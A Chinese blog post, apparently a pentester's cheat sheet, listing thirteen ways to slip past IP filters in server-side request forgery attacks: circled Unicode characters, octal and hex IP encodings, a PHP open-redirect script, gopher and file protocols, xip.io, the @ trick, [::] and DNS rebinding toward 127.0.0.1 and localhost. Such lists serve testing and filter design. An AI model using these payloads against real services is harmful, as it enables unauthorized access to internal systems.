绕过IP格式限制/SSRF


在有些场景可能会遇到绕过ip限制的地方,如ssrf等

1.enclosed alphanumerics方式

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
------
可用List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿
⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣
⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ
Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫
⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

例如127.0.0.1

① ② ⑦.⓿.⓿.①

或者:

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

2.短网址

网址缩短, 如
http://6du.in/
https://www.urlc.cn/

3.句号代替点

127。0。0。1

4.302跳转


<?php  
$schema = $_GET['s'];
$ip     = $_GET['i'];
$port   = $_GET['p'];
$query  = $_GET['q'];
if(empty($port)){  
    header("Location: $schema://$ip/$query"); 
} else {
    header("Location: $schema://$ip:$port/$query"); 
}

5.利用其他协议绕过

File协议
GOPHER协议
dict

6.利用特殊域名 xip.ip

访问这个网址任何子域都会跳转到子域,利用的原理是DNS解析

http://127.0.0.1.xip.io 与 127.0.0.1

http://127.0.0.1.xip.io/
http://www.owasp.org.127.0.0.1.xip.io/

7.IP编码

10进制
16进制
8进制

(1)、8进制格式:0300.0250.0.1

(2)、16进制格式:0xC0.0xA8.0.1

(3)、10进制整数格式:3232235521

(4)、16进制整数格式:0xC0A80001

如:

192.168.0.1与8进制格式:0300.0250.0.1

以及:

115.239.210.26  >>>  16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x

8.省略绕过

Windows下:
0代表0.0.0.0

Linux下:
0代表127.0.0.1

9.@绕过

访问http://www.baidu.com@10.10.10.10与http://10.10.10.10请求是相同的

10.localhost

localhost或者0.0.0.0

攻击本地:

http://127.0.0.1:80
http://localhost:22

11.利用[::]

利用[::]绕过localhost

http://[::]:80/  >>>  http://127.0.0.1

12.利用上传


也不一定是上传,我也说不清,自己体会 -.-
修改"type=file""type=url"
比如:
上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF

13.利用DNS解析

在域名上设置A记录,指向127.0.1


文章作者: 剑胆琴心
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 剑胆琴心 !
评论
 本篇
绕过IP格式限制/SSRF 绕过IP格式限制/SSRF
在有些场景可能会遇到绕过ip限制的地方,如ssrf等 1.enclosed alphanumerics方式ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com ------ 可用List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩
2021-08-26
下一篇 
python几个提取域名的库 python几个提取域名的库
懒得写正则,就在网上找了找,发现了两个还不错的提取域名的第三方库赶紧拿出我的小本本记下,下次用的时候好找 tldextract安装: pip3 install tldextract 使用: >>> import tldextract
2021-08-19
  目录